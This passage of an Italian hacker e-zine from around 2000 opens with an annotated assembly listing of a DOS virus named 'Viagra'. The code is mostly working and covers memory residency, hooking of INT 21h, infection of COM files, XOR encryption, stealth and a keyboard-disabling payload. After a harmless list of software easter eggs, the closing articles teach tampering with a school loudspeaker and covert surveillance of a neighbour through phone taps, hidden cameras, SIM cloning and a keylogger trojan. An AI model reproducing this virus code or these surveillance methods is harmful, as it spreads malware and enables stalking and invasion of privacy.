all'interno del codice xche tutti i riferimenti ai dati sono assoluti.
Per sapere dove sono faccio una chiamata a CALL get_offs.
L'istruzione CALL pusha in memoria l'IP (per poi recuperarlo con un
eventuale RET). Io prelevo l'IP dallo stack, sotraggo la posizione
relativa del get_offs ed ottengo, in BP (in questo caso) l'offset ;).

start:
call get_offs
get_offs:
pop bp
sub bp,offset get_offs ; In BP offset

Adesso in BP ho l'offset per tutti i riferimenti ai DATI.
Il secondo pass e' controllare se il virus e' crittato. Per fare
cio' controllo un particolare dato:

; Check if encrypt
lea si,(encrypt_start + bp)
cmp byte ptr cs:[si],90h ; Encrypted ?
je encrypt_start ; Seems to be not :D

Se il corpo e' crittato e' necessario decrittarlo prima che venga
eseguito. La crittazione e' con un semplice XOR a chiave variabile.
Ogni copia del virus ha la sua chiave specifica (Key).
Se non e' crittato, tralascia questa fase.

; Decryption Routine
lea si,(Key + bp)
mov bx,ds:[si] ; BX = Key
lea si,(encrypt_start + bp) ; SI = Start of encrypted part
mov cx,((offset encrypt_end - offset encrypt_start)/2)+1 ; CX Size of part to decrypt
dec_loop:
mov ax,word ptr ds:[si] ; 16-Bit simple XOR encryption
xor ah,bl
xor al,bh
mov word ptr ds:[si],ax
inc si
inc si
loop dec_loop
encrypt_start:
nop

Adesso devo controllare se il virus e' gia' in residente in memoria. Per
fare cio' utilizzo una particolare chiamata con determinati dati.
Se il virus e' gia' residente controlla se siamo per il DoS (Denial of
Service) ed esegui programma ospite (regole 1 e 2).

mov ax,'VI' ; Controlla se gia' residente
mov bx,'Id' ; Comando di Ident
int 21h
cmp ax,'OK' ; Si,e' residente
jmp install

Adesso controlla se DoS:

; Virus presente nel sistema
; Controlla se momento DoS
mov ah,2Ah ; Get System Date
int 21h
cmp dl,1 ; Monday ?
jne no_more_mem ; Nop...skip...
cmp dh,10 ; October or better ?
jb no_more_mem ; Nop...skip...
mov ah,2Ch ; Get System Time
int 21h
mov ch,13 ; Between 13:00 and 13:59 ?
jne no_more_mem ; Nop...skip...
in ax,40h ; Get Random Number
cmp ax,3400h ; Smaller than .... ?
ja no_more_mem ; Nop...skip...
; Yes ! DoS now !

Si, bisogna eseguire il DoS:

mov ax,'VI' ; Controlla se gia' residente
mov bx,'Do' ; Comando di DoS
int 21h

Se errore oppure gia' installato esegui programma ospite. La tecnica e'
semplice: rimetto a posto il JUMP iniziale e lo eseguo dall'inzio. Siccome
la modifica influenza solo il programma in memoria, il file su disco
rimane inalterato:

no_more_mem:
; Non ci sono speranze di installare, esegui file ospite.
cmp bp,0 ; Ospite presente ?
je no_guest ; Nop,esci.
; Copia JMP originale
lea si,(OrigJMP + bp)
mov di,0100h
mov cx,3 ; 3 Word = 6 Bytes
rep movsw ; Copia
push 0100h ; Alias jmp 0100h :)
ret

Adesso, siccome il virus non e'installato, devo installarlo in memoria.
Per fare cio'ci sono svariate tecniche: la piu' comune e' allocare un
blocco di memoria alta e marcarlo come di sistema,per essere invisibile ad
un eventuale 'mem':

install:
call mem_install
jmp no_more_mem ; Esci e/o esegui ospite

mem_install:
; ----< THIS code ripped from Dark Angel
mov ah,4Ah ; Allocate Memory
mov bx,0FFFFh ; Ridicolous Size
int 21h
jmp no_more_mem
mov ah,4Ah ; Alter Memory
sub bx,(offset end_virus - offset start + 15)/16+1 ; Subtract Virus size
int 21h
mov ah,48h ; Allocate Memory
mov bx,(offset end_virus - offset start + 15)/16 ; Virus size
int 21h
push ax ; Salva segmento
dec ax
mov es,ax ; ES = Segment of MCB
mov byte ptr es:[0],'Z' ; Last MCB
mov word ptr es:[1],0008h ; DOS Owner of this memory
pop es ; Riprendilo: ES=Segmento del virus

Adesso copia il codice del virus nell'area di memoria per lui allocata:

; Copia virus nella nuova area di memoria ES:DI
mov si,bp ; in SI offset
mov di,0100h
add si,di ; Aggiungi 100h :)
mov cx,((offset end_virus - offset start)/2)+1 ; Size in WORD del virus
rep movsw ; Copia !
push es
push ds
mov ax,es ; in DS segmento del virus
mov ds,ax ; DS = ES
xor ax,ax
mov es,ax ; ES = AX = 0

Ora devo reindirizzare le chiamate all'interrupt. Invece di usare le
opportune chiamate del MS-DOS preferisco agire al livello piu' basso
possibile, modificando direttamente la memoria:

mov bx,word ptr es:[4*21h+0] ; OffSet
mov ax,word ptr es:[4*21h+2] ; Segmento
mov word ptr ds:[INT21h],bx ; Offset
mov word ptr ds:[INT21h[2]],ax ; Segmento
cli ; Disabilita INT
mov word ptr es:[4*21h+0],offset newint21h ; OffSet
mov word ptr es:[4*21h+2],ds ; Segmento
sti ; Riabilita INT
pop ds
pop es
mov dx,cs
mov es,dx
ret

Se non c'e' un file ospite (xche magari e' il virus originale) esci
tranquillamente.

no_guest:
int 20h
nop

Questo e' il messaggio che il virus deve contenere per poterne
identificare il nome e l'autore. Naturalmente, una volta compilato ed
eseguito, il messaggio e' codificato ed invisibile ad occhio nudo.

Viagra db "[Viagra]",00h,"* Araknoid v0.1 * D.N.A.! ",13,10
db "Hey man, your computer need some Viagra !$"

encrypt_end:
ret
hlt
cli

Word che contiene la chiave di codifica/decodifica

Key dw 0

Questa e'la parte principale e piu' critica del virus. Questa parte di
codice si occupa di infettare e nascondere il virus. Fate attenzione ai
passaggi:

; -=> HANDLER Interrupt 21h

Questa variabile contiene l'offset dell'interrupt 21h originale.

INT21H dd ?

Questo primo pezzo serve per interpretare i comandi:

newint21h proc far
Assume CS:CODE_SEG, DS:Nothing
cmp ax,'VI' ; Virus Command ?
jne check_call
cmp bx,'Id' ; Ident ?
jne No_Id ; Nop
mov ax,'OK' ; Reply OK :)
No_Id:
cmp bx,'Do' ; DoS ?
jne End_Int ; Nop..exit Interrupt now !
jmp dos ; Yes DoS !
End_Int:
ret 2

Adesso si cerca di identificare la chiamata pervenuta (per la
documentazione relativa vi consiglio le Ralph Brown Interrupt List):

check_call:
cmp ah,4Bh ; Load and Execute ?
je load_execute
cmp ah,11h ; Find First Matching File (Dir Stealth)
je dir_stealth
cmp ah,12h ; Find Next Matching File (Dir Stealth)
je dir_stealth
cmp ax,4300h ; Get File Attributes
je load_execute
cmp ax,4301h ; Set File Attributes
je load_execute
cmp ah,3Dh ; Open File
je load_execute
cmp ah,4Eh ; Find First Matching File (Dir Stealth)
je newdir_stealth
cmp ah,4Fh ; Find First Matching File (Dir Stealth)
je newdir_stealth
jmp do_int_now

Questa e' la procedura di stealth. Il processo e'semplice: ogni volta che
si richiede la lista dei file/directory il virus sa' che ad ogni elemento
della lista corrisponde un potenziale file infetto. Il virus controlla se
e' infetto (Time mark: 62 secondi) e, se lo e', sottrae la dimensione del
virus alla dimensione totale del file cosi' la regola 1 e' soddisfatta e
l'utente poso attento non si accorge di nulla.

dir_stealth:
pushf ; INT 21h
call INT21H ; Esegui Chiamata DOS
; Now DS:DX point to a valid FCB into DTA
; To stealth i must modify FCB directly there :)
push ax
push bx
push cx
push dx
push es
cmp al,0FFh ; "No More Matching file"
je not_to_stealth
mov ah,2fh ; Get address to current DTA
pushf ; INT 21h
call INT21H ; Esegui Chiamata DOS
; Now in ES:BX there is DTA address
cmp word ptr es:[bx+08h],'OC' ; First chech if file is a COM
jne not_to_stealth
mov cx,word ptr es:[bx+16h] ; Check if infected (Sec set to 62)
and cx,1Fh ; Reset all unwanted bit :) AND 0000000000011111b
cmp cx,1Fh ; Marked ?
jne not_to_stealth ; Nopa,skip over
; Now subtract Virus Size to File Size
mov cx,word ptr es:[bx+1Ch] ; In CX file size
sub cx,(offset end_virus - offset start) ; Subtract it :)
mov word ptr es:[bx+1Ch],cx ; Replace over
; Finish !
not_to_stealth:
pop es
pop dx
pop cx
pop bx
pop ax
ret 2 ; Return home :)

Adesso cerca di infettare un file eseguito. Prima di infettare il virus
deve controllare se il file corriponde ai requisiti richiesti: essere un
vero COM e che il nome non inizi per 'W'.

load_execute:
push ax
push bx
push cx
push dx
push es
push ds
push di
push si
call InfectIfCom ; DS:DX nome del file
pop si
pop di
pop ds
pop es
pop dx
pop cx
pop bx
pop ax
do_int_now:
pushf
call INT21H ; Chiama DOS originale
ret 2

Questa e' un'altra procedura stealth per le directory. Siccome ne esiste
una nuova ed una vecchia per sicurezza ho deciso di "stealtharle" tutte e
due :).

newdir_stealth:
pushf ; INT 21h
call INT21H ; Esegui Chiamata DOS
; Now DS:DX point to a valid FCB into DTA
; To stealth i must modify FCB directly there :)
jnc do_stealth ; All ok ?
ret 2
do_stealth:
pushf
push ax
push bx
push cx
push dx
push es
mov ah,2Fh ; Get address to current DTA
pushf ; INT 21h
call INT21H ; Esegui Chiamata DOS
; Now in ES:BX there is DTA address
mov cx,word ptr es:[bx+16h] ; Check if infected (Sec set to 62)
and cx,1Fh ; Reset all unwanted bit :) AND 0000000000011111b
cmp cx,1Fh ; Marked ?
jne newnot_to_stealth ; Nopa,skip over
; Now subtract Virus Size to File Size
mov cx,word ptr es:[bx+1Ah] ; In CX file size
sub cx,(offset end_virus - offset start) ; Subtract it :)
mov word ptr es:[bx+1Ah],cx ; Replace over
; Finish !
newnot_to_stealth:
pop es
pop dx
pop cx
pop bx
pop ax
popf
ret 2 ; Return home :)
newint21h endp

Ora infetta un file COM. Fare molta attenzione ai vari passaggi:

; Infect a COM
infect_com:
; ---
push 0B800h
pop es
mov bx,(80-2)*2
mov byte ptr es:[bx],'V'
mov byte ptr es:[bx+1],08h
; --- DO ENCRYPTION -------------------
get_rand:
in ax,40h ; Get Pseudo-Random Number
cmp ax,0
je get_rand
mov word ptr cs:[Key],ax ; Key is into AX
call EncDec ; Encode
; --------------------------------------
; Now we are ready to infect but before do it it's safe to save all attrib.
; and Date's and Time's last modify to prevent suspect :)
; Variables is also to prevent stack problem.
mov ax,4300h ; Get file attributes
pushf ; INT 21h
call INT21H ; ----^
mov word ptr cs:[FileATTR],ax
mov ax,4301h ; Set File attributes
mov cx,00100000b ; Prevent Read-Only et simila
pushf ; INT 21h
call INT21H ; ----^
mov ah,3dh ; Open File to infect
mov al,00000010b ; Read Write Compatibility Mode
xor cl,cl
pushf ; INT 21h
call INT21H ; ----^
jnc do_read ; All Ok,continue :)
jmp f_open_err ; If fail, escape now ! :(
do_read:
push dx ; Salva dati
push ds
mov bx,cs ; BX = CS
mov ds,bx ; DS = BX
xchg bx,ax ; BX = File Handle
call GetTime ; Salva Data e Ora ultima modifica
mov ah,3fh ; Read from file (First 6 Bytes,enought for replace JMP)
mov cx,6 ; 6 Byte (2 Anti-TBAV,3 JMP and 6th is Virus Mark)
lea dx,OrigJMP ; Point to 6-Byte Buffer
pushf ; INT 21h
call INT21H ; ----^
jnc do_check ; All ok,continue :)
jmp f_common_err ; If error, escape now ! :(
do_check:
lea si,OrigJMP
cmp word ptr cs:[si],'MZ' ; False COM ?
je f_common_err ; Shit...
cmp word ptr cs:[si],'ZM' ; False COM ?
je f_common_err ; Shit...
add si,5 ; Pointer to 6th element
cmp byte ptr cs:[si],'V' ; Virus Mark Found ?
je f_common_err ; File already infected...mmm...exit !
mov ax,4202h ; Seek to the end of file (to have file size)
xor cx,cx ; 0
xor dx,dx ; 0
pushf ; INT 21h
call INT21H ; ----^
jc f_common_err ; Shit, it fail ! :(
mov di,ax ; DI contains File Size
mov ah,40h ; Write to file
mov cx,(offset end_virus - offset start) ; Size of virus
mov dx,0100h ; Write all VIRUS Code :D
pushf ; INT 21h
call INT21H ; ----^
jc f_common_err ; Shit, it fail ! :(
mov ax,4200h ; Seek to TOP af file
xor cx,cx ; 0
xor dx,dx ; 0
pushf ; INT 21h
call INT21H ; ----^
jc f_common_err ; Shit, it fail ! :(
lea si,TempJMP

Questa e'la parte in cui si sostituisce la prima istruzione del file in un
JMP per eseguire il virus. Attenzione alla tecnica usata per generare il
nuovo JMP:

mov byte ptr cs:[si],24h ; Anti-TBAV Tricks
mov byte ptr cs:[si+1],21h ; --^
mov byte ptr cs:[si+2],0E9h ; JMP Opcode
mov ax,di ; AX = File Size
sub ax,5 ; Sub 5-Byte of JMP
mov byte ptr cs:[si+3],al ; LSB
mov byte ptr cs:[si+4],ah ; MSB
mov byte ptr cs:[si+5],'V' ; Virus Mark
mov ah,40h ; Write to file
mov cx,6 ; 6 Byte
lea dx,TempJMP ; New JMP
pushf ; INT 21h
call INT21H ; ----^
jc f_common_err ; Shit, it fail ! :(
call SetTime ; Salva Ultima Modifica e Ora
f_common_err:
mov ah,3eh ; Close file
pushf ; INT 21h
call INT21H ; ----^
pop ds ; Preleva Dati Salvati
pop dx
mov ax,4301h ; Set File Attributes (Restore old ones)
mov cx,word ptr cs:[FileATTR]
pushf ; INT 21h
call INT21H ; ----^
f_open_err:
mov ax,word ptr cs:[Key]
call EncDec ; Decode
; ---
mov bx,(80-2)*2
mov byte ptr es:[bx],' '
mov byte ptr es:[bx+1],0Fh
; ---
ret

Questa e' la procedura di Codifica/Decodifica:

; Key for encode/decode must be stored in AX
EncDec:
mov bx,ax ; BX is Key
lea si,encrypt_start ; SI = Start of encrypted part
mov cx,((offset encrypt_end - offset encrypt_start)/2)+1 ;
CX Size of part to decrypt
enc_loop:
mov ax,word ptr cs:[si] ; 16-Bit simple XOR encryption
xor ah,bl
xor al,bh
mov word ptr cs:[si],ax
add si,2
loop enc_loop
; Now Write Some Garbage Data !
mov cx,10
lea si,dummydata
garb_loop:
in ax,40h
mov word ptr cs:[si],ax
add si,2
loop garb_loop
ret

Queste sono procedure secondarie

GetTime:
mov ax,5700h ; Get File Time and Date
pushf ; INT 21h
call INT21H ; ----^
mov word ptr cs:[FileDATE],dx
mov word ptr cs:[FileTIME],cx
ret

SetTime:
mov ax,5701h ; Set File Time and Date
mov cx,word ptr cs:[FileTIME]
mov dx,word ptr cs:[FileDATE]
or cx,1Fh ; Setta secondi a 64 :)
pushf ; INT 21h
call INT21H ; ----^
ret

Alcune variabili:

FileATTR dw 0 ; Some Variables
FileDATE dw 0
FileTIME dw 0

Ecco una parte interessante: nelle due variabili seguenti viene
memorizzato il JUMP originale sia del virus che dell'ospite.

TempJMP db 6 DUP(00h) ; Store Temporary New JMP
OrigJMP db 6 DUP(00h) ; Store Original JMP

Questa procedura controlla che il file scelto sia veramente un .COM.
Per prima cosa scanna la stringa alla ricerca dell'ultimo '.' (dot) che
sicuramente equivale all'inizio dell'estensione del file. Allora prende il
precedente '\' (backslash) che equivale sicuramente al punto di inizio del
nome.

; Check if file in DS:DX is a .COM
InfectIfCom:
mov si,dx ; SI = DX
xor di,di ; DI = 0
Is_Loop:
cmp byte ptr ds:[si],'.' ; Ext ?
je Is_Ex
cmp byte ptr ds:[si],'\' ; Reminder last '\'
jne Is_NoD ; Nopa
mov di,si ; DI = Last '\'
Is_NoD:
inc si
cmp byte ptr ds:[si],00h ; Fine ?
jne Is_Loop
Is_No:
ret
Is_Ex:
inc di ; Seek on first letter of File Name
cmp byte ptr ds:[di],'W' ; File Name start with 'W' ?
je Is_No ; Yes, don't infect (can be WIN.COM)
inc si
cmp byte ptr ds:[si],'C'
jne Is_No
inc si
cmp byte ptr ds:[si],'O'
jne Is_No
inc si
cmp byte ptr ds:[si],'M'
jne Is_No
jmp infect_com

E questa e'la routine del DoS:

; ----
;
; DoS Routine
posx db 01h
posy db 01h
dirx db 00h
diry db 00h

dos:
; Disable Keyboard input
cli ; Disabilita INT
mov bx,word ptr es:[4*03h+0]
mov dx,word ptr es:[4*03h+2]
mov word ptr es:[4*09h+0],bx ; OffSet
mov word ptr es:[4*09h+2],dx ; Segmento
sti ; Riabilita INT
mov ah,09h ; Display String
lea dx,Viagra
pushf ; INT 21h
call INT21H ; ----^
...


; End of Sign

dummydata db 20 DUP(90h)

end_virus:

CODE_SEG ENDS

END start

==============================================================================
<zerozone@freemail.it> == v1.0 [04-01-2000] == http://zap.to/ozone
==============================================================================

---0.Zone---

#####################################################
####### TTTTTTT RRRR III CCCC K KK SSSS #######
####### TTT R R III C K K S #######
####### TTT RRRR III C KK SSSS #######
####### TTT R R III C K K S S #######
####### TTT R RR III CCCC K KK SSSSS #######
#####################################################

-=!!!|-fUn aT tHe sCh00l!-|!!!=-

Autore: c(H)e

Anarkia anke nell'informazione skolastika.... (l'altoparlante ke fino a poko
tempo fa era esclusiva del preside....)

Classe. Un kazzo da fare, come al solito. La prof di latino....
"...L'impero di Augusto era illuminato, nell'arte, soprattutto. Produsse
scritti meravigliosi, non come sotto Stalin (e un mio compagno sottovoce:
"non toccatemi Stalin"), non come in Cina ("non toccatemi la Cina non
come a Cuba (" Porko dxo, non toccatemi Fidel!") . "

La mia inkazzatura aumenta, aveva osato dire male di Cuba, kazzo. Ad un certo
punto una voce esce dall'altoparlante, il preside che dice le solite menate.
E in me nasce un'idea... e se a meta' lezione mentre la prof dice kontro
Cuba (tanto succede sempre) si sente dall'altoparlante una canzoncina come
"Hasta siempre Comandante", "Coihba" e un po' di versi ai prof???? hihiihi
Se avete anke voi una prof nazista o volete seplicemente rompere il kazzo
in classe, leggete (merda, sembra una propaganda elettora le di Berluskazzen:

-[ Se volete un'Italia migliore...FANKULO! ]-

Occorrente:
-uno walkman
-un paio di cuffie da spakkare
-un paio di palle
-un paio di pinze da elettricista
-una cassetta su cui registrare quello che volete far sentire
-una classe da sodomizzare Ok???

Innanzitutto vi mettete in un posto dove nessuno rompa i koglioni, con i
vostri attrezzi intorno. Prendete le cuffie del kazzo e ne tagliate il
filo a una 10ina di cm dagli auricolari (basta di una). A questo punto
(usando naturalmente la parte con lo spinotto (buttate via le kuffie :))
dividete i due fili di plastica e ne spellate uno (che e' di una delle 2
cuffie, non importa quale) . A questo punto potreste avere due 2 scenari
diversi davanti a voi:

1) Avete due fili, uno rosso e uno verde (che collegherete all'altoparlante
in classe) (o del colore che kazzo gli pare) singoli. Questo e' il caso
leggermente + complicato, perchè i deu fili devono essere isolati fra
loro (non devono fare contatto) quindi ci e' stato messo
un isolante colorato. Essendo un isolante, una volta tagliati i fili, non
potete semplicemente ricollegarli, ma dovete grattare via il colorante per
fargli fare contatto (o saldarli, ma vi voglio vedere a portare un
saldatore a scuola....hehehe=:-) .Il problema e' che i due fili sono in
generemolto sottili e levare il colorante puo' essere un problema. Io
consiglio di prendere un piano duro (possibilmente non il tavolo di casa
da 9 milioni....hehehe), appoggiarci sopra il filo e delicatamente
(mooolto, attenti a non strapparlo), con un coltello molto affilato,
grattarlo. A questo punto fate in modo di poterli riconoscere tra di loro.

2) Avete un filo verde (o rosso) e una matassa di fili (che sostituiscono
l'altro. Fate come vi ho detto prima per il filo verde.... gli altri non
sono isolati, quindi non c'e' bisogno.

Se volete fare un prova, ricollegateli alla parte dell'auricolare
(dopo aver spellato anche quella) e guardate se funzia. A questo punto.
e' venuta l'ora di provare con un altoparlante "vero".

Se non avete voglia di rubare da una classe (magari non vostra) il
famigerato altoparlante, prendete una radio (possibilmente non nuova
di pacca, vi tocca spakkarla!!:), smontatela e staccate l'altoparlante
dal resto. Dovreste avere anke qui due fili che arrivano all'altoparlante.

Questa volta, essendo fili + grandi, sono isolati con "tubicini di
plastica... li spellate e li collegate con la parte delle kuffie con cui
avete lavorato prima.... attakkate il connettore allo walman e dovrebbe
funziare.

Per l'altoparlante di skuola e' la stessa cosa, solo che i fili non vanno
direttamente all'altoparlante, ma prima, passano dall'amplificatore.

Fregatevene: stakkate i fili che vanno dall'amplificatore all'altoparlante
(se mi dite che non sapete qual'e' l'amplificatore vi sbudello:) e ci
collegate i bei fili dell'walkman.

Se per kaso nel vostro modello non ci fosse l'amplificatore (non l'ho mai
trovato cosi':) e' ankora + semplice... fate come avete fatto a casa con la
radio......

ah... quasi mi scordavo... quando lavorare, direte voi... se non siete
espertini (INI) e non volete farlo a ricreazione (anke se c'e' il tempo +
che suff) andate a skuola durante i consigli di classe, o nelle aperture
pomeridiane.... la skuola e' vuota.... fate anke un visitina negli
armadietti dei custodi, se ce la fate!!!!:)))))))

Per levare il problema di avviamento, preparate la cassetta con un po' di
tempo vuoto prima della registrazione (in modo da poterlo avviare all'inizio
della lezione e che la musica inizi dopo un po')
Per ovviare al problema di nasconderlo, io consiglio dietro l'altoparlante,
in genere c'e' abbastanza spazio....senno' fate voi!!!!


P.S.: Non mi assumo nessuna responsabilita' per il cattivo utilizzo di questo
documento, che e' a solo scopo informativo.
Il preside vi potrebbe mangiare vivi...:)

P.P.S.: Sto cercando di collegare un walkman o un qualcosa di simile ad un
"nodo" per farlo sentire a tutto un piano... se mai ci riusciro' (ho paura
di dover smurare. . .al'interno di una skuola, davanti ai bidelli! :)
scrivero' qualcosa per farvi sapere!!!!!

---C(h)e---

-=!!!|-Ovetti di Pasqua dall'-=AiS production=- per tutti voi!!-|!!!=-

Autore: The Jackal


Potevamo noi dell'AiS non pensare a tutti voi, amati lettori, che vi
apprestate a vivere queste vacanze di Pasqua senza avere tra le mani
la vostra web-zine preferita (NdR. Non ti starai allargando troppo?!)?
Naturalmente no!! Ma dato che mandare un ovetto di Pasqua a tutti
sarebbe stato impossibile (avremmo dovuto scendere a patti con la
L.I.S.A. affinche' scannerizzasse le vostre menti alla ricerca dei
nostri articoli...), abbiamo pensato di regalarvi alcune delle
sorpresine contenute nei programmi e nei sistemi operativi piu'
conosciuti.
Dato che scrivo proprio nel giorno di Pasqua (ed il termine ultimo per
la consegna degli articoli e' tra 3 giorni), non avro' il tempo di
provarli tutti... infondo, conta soltanto il pensiero!!

~ Piccola nota...

Tutti gli easter eggs che sto per scrivere sono stati liberamente
copiati e tradotti dal sito HTTP://WWW.EEGGS.COM
Ce ne sono 3297 su film, libri, Tv, musica e, naturalmente, su tutto
quello che riguarda il computer (giochi, programmi e, persino, hardware).
Da visitare!!

~ Windows 95/98/2000

*[ Volcanoes ]*

Andate al Pannello di Controllo --> Schermo
Click sulla maschera degli Screen Savers
Selezionate lo Screen Saver Testo3D ed andate nelle sue Impostazioni
Selezionate la voce Testo in Visualizza
Digitate la parola "volcano" (senza apici) e godevi lo spettacolo...

~ Windows 95

*[ Bill Gates' Horse, Nugget ]*

Avviate Windows 95
Aspettate finche' non vedrete il cursore nel mezzo dello schermo nero
Premete i tasti seguenti nell'ordine esatto e senza le virgole:
Ctrl, F6, Right shift, Delete, tasto destro del mouse
Se sarete riusciti a farlo prima che sia comparso il vostro sfondo,
dovreste vedere Nugget, il cavallo dello zio $ill...


*[ Product Team Credits ]*

Click col tasto destro sul Desktop
Scegliete Nuovo --> Cartella
Chiamatela "and now, the moment you've all been waiting for"
Ancora click col tasto destro sulla nuova cartella per rinominarla in:
"we proudly present for your viewing pleasure"
Fatto questo, rinominarla in "The Microsoft Windows 95 Product Team!"
Aprite la cartella e godetevi i tanto sudati credits...

~ Windows 98

*[ Windows 98 Team 2 ]*

Doppio click sull'orologio per visualizzare le proprieta' Data-Ora
Cliccare sulla Impostazione del fuso orario
Tenere premuto il tasto Ctrl (questa e' la parte piu' difficile)
Cliccate e tenete premuto il tasto del mouse sul Cairo, Egitto.
Con il tasto del mouse ancora premuto, trascinate il puntatore su
Baton Rouge, LA
Lasciate pure il tasto del mouse, ma non mollate il Ctrl.
Cliccate nuovamente il tasto del mouse e trascinate il puntatore da
Baton Rouge a Redmond, WA
Lasciate il tasto, e se avrete fatto tutto correttamente, dovreste
godervi un bel filmatino...

~ WinAmp 2.xx

*[ STARS!! ]*

Avviate WinAmp 2.xx
Avviate un file audio
Settate la visualizzazione sul fire style
Cliccate su "winamp" per rendere la finestra piu' piccola
Cliccate il logo piccolo all'estrema sinistra
Click su Nullsoft WinAmp
Click sulla tabella all'estrema destra
Godetevi lo spettacolo...
(se ci riuscite ditemi con quale versione l'avete fatto!!)

~ Internet Explorer 5.0

*[ Trident Team Credits ]*

Aprite IE5 verione finale (5.00.1402.16 o superiori)
Digitate "about:<!-- introducing the Trident team -->"
nella linea dei link...

*[ Wacky Search Menu ]*

Dal Menu', selezionate Strumenti --> Opzioni Internet
Nella tabella Generale, cliccate su Lingue
Aggiungetene una nuova con il nome (senza apici) "ie-ee" e date l'ok
Spostate "Definito dall'utente[ie-ee]" all'inzio della lista
Uscite e tornate ad Internet Explorer
Fate click sul pulsante Cerca
Troverete una nuova voce, Selezionate 'Previous Searches'
Buona visione...

~ Norton Utilities 2000

*[ CD Fun in Norton Utilities 2000 ]*

Aprite la directory delle NU dal vostro CD-rom (originale!!)
Cercate ed eseguite Nuegg.exe
Buon divertimento...

~ L'angolo dei classici

*[ Excel 97 FLIGHT TO CREDIT ]*

Create un nuovo foglio di lavoro
Premete F5
Scrivete X97:L97 e poi Invio
Premete il tasto di Tabulazione
Premete Ctrl-Shift
Premete anche il pulsante dei grafici nella barra dei comandi in alto
Usate il mouse per svolazzare...

*[ Word 97 Pinball ]*

Aprite un nuovo documento
Digitate la parola Blue
Selezionate la parola e grassettatela
Cambiatene anche il colore in blu
Digitate anche uno spazio di fianco alla parola appena personalizzata
Selezionate la voce "Informazioni su..." nel menu' ?
Quando vi appare la maschera delle informazioni,
cliccate sul logo di Word in alto a sinistra
Giocate pure al flipperino...


Questa e' tutto. Molto altro ancora potrete trovarlo al sito che vi ho
consigliato. Prima di chiudere, permettetemi di augurare una Buona
Pasqua a tutti voi, credenti e non... (anche se, quando leggerete questo
pezzo, sara' ormai tutto trascorso).
Un saluto particolare va a Mary... perche', se fossimo ancora insieme,
oggi (23 Aprile) sarebbe, ancora una volta, un giorno speciale.

---ThE Jackal---


-=!!!|-cHi l0gGa sI dIvErTe-|!!!=-

Autore: Gouranga


Loggare non credo sia una pratica di phreaking, neanche di hacking o simili,
credo che sia una cosa a sè.
Ora vi insegnerò come loggare il vicino, l'occorente è:

L'acesso fisico alla casa della persona

-Un ricetrasmettitore 2GhZ
-Un cavetto per collegare il cellulare al pc
-Un registratore di chiamate
-Un telefono

Acesso fisico ad una centralina

-Una videocamera
-Una microcamera
-Un ricevitore (radioscanner) 1800MhZ
-Cinque o sei magneti abbastanza potenti
-1 microfono
-Casette tipo vhf 120-180 min.
-Un cellulare
-Ampliatore di frequenza

Loggare mi è sempre piaciuto.....anche se credo che sia una tra le cose più
sporche che ci siano, daltronde siamo spiati di giorno e di notte dall'occhio
del Grande Fratello......

Ho sempre voluto sapere quelle piccole cose che un giorno potrebbero esermi
utili.
La conoscenza è potere.
Le cose che intendo spiare non sono riprendere la figlia del vicino mentre si
fa la doccia. Questi metodi venivano usati anche da NSA, F.B.I., KGB, molti
anni fa, prima dei tempi dell'assassinio di Kennedy, ora usano cose che
neanche ci immaginiamo.

Le parole loggare, loggatore, logghista, sono parole che indicano le persone,
il mestiere o le cose che spiano e inseriscono tutto all'interno di un file
con estensione log o simili. O detto anche cose perchè esistono satelliti che
loggano, videocamere o regisratori oltre a persone.

Trent'anni fa circa chi pronunciava al telefono le parole chiave saddam,
presidente, attentato, terrorismo, Allah (o elencato queste ma sono a
migliaia), la sua linea veniva captata e inviata subito a un computer che
registrava, si parla di 30 anni fa.

La persona spiata non deve sapere di essere spiata (?).
Voi dovete essere completamente anonimi (almeno per il tempo del loggaggio).
L'acesso fisico alla casa è fondamentale. Senza di esso potete fare ben poco.

Il ricetrasmettitore 2GhZ è importante per sentire communicazioni su cordless
(da 959.0000 a 960.0000), provocare interferenze o "infiltrarsi" nella
communicazione, sentire conversazzioni cellulari eTacs
(da 900.0000 a 950.0000), ricevere segnali radio, fare interferenza su radio
locali o cose simili (80 MhZ circa).

I cordles hanno la caratteristica di trasmettere sempre sulla stesa frequenza,
o cambia di pochi KhZ.

Se volete solo ascoltare allora va benissimo il radioscanner 0.5 khz 1800 MhZ.
Ora prendete il vostro fidatissimo registratore di chiamate, prendete
un cavo telefonico e scarnatelo, vi usciranno 4 cavi, prendete i due centrali.

Scarnateli e collegateci due coccodrillini, collegate il pin dalla parte
opposta al reggistratore e i coccodrillini alla centralina (rosso con rosso,
restante con restante).

I registratori di chiamate hanno la capacità di registrare solo le chiamate
in uscita o in entrata, od'entrambe, sono capaci di sentire quando una persona
alza l'aparecchio telefonico evitando sprechi di nastro.

Hanno anche la possibilità di memmorizzare i numeri coposti.
Si possono vedere così i numeri che la persona chiama più di frequente.
Un servizzio utile è l'1412, inserendo il numero telefonico ti dice
l'intestatario.

La telecamera è utilissima, avete cespugli o bidoni dell'immondizia vicino
alla casa della persona spiata? benissimo, mettete la telecamera sotto il
cespuglio o dietro il bidone, o create anche una postazione a se, anche se è
molto più in evidenziata. La microcamera (chi è il fortunato che ne ha una) è
in grado di trasmettere tramite infrarosso, cavo o etere immagini che vengono
lette dal lettore pur essendo grande pochi centimetri.

La microcamera può essere messa sul televisore, dalla parte delle casse audio,
dove ci sono i forellini (?).

Con la centralina potete sempre fare ponte, così le chiamate passano sempre
anche per casa vostra, il problema è sapere quale linea è quella di casa
vostra. Il cavetto che collega il cellulare al pc si usa per clonare la sim
card o il telefonino tacs in media.

Software di clonazione ne trovate a migliaia, comprese le istruzioni di come
clonare. Una volta clonata la sim potete fare chiamate a nome del possesore
della sim o adirittura riceverle....

Non rispondere mai se si ha la certezza che il loggato sta per rispondere, non
far mai sentire la propia voce.
Seguire i movimenti della persona è importante...

Possibilmente vedere anche dentro il suo cestino per vedere se trovate carte
o cose che possono tornare sempre utili.

Bisogna conoscere il passato di una persona, nei minimi dettagli possibilmente.

Non bisogna entrare in questo argomento con nessuno, potrebbe sempre riferire.

I magneti servono per creare piccole interferenze via etere, basta metterli
sull'antenna. La vittima ha un PC con windows installato? Potete usare un
programma di key logger, cioè un programmino che memorizza dentro un file log
tutti i tasti della tastiera premuti, quello che ho allegato è fantastico,
spedisce addirittura tramite e-mail il file log (telnet credo).

Una volta spediti si autodistrugge dal computer insieme al programma non
lasciando alcuna traccia, fantastico.

Tutto avviene tramite un trojan di 21 kb e il programma, invisibile
praticamente. La cosa migliore è vedere i file sul PC di una persona, usare
netbus o simili, è da lamer ma funziona, anche se la cosa migliore è accedere
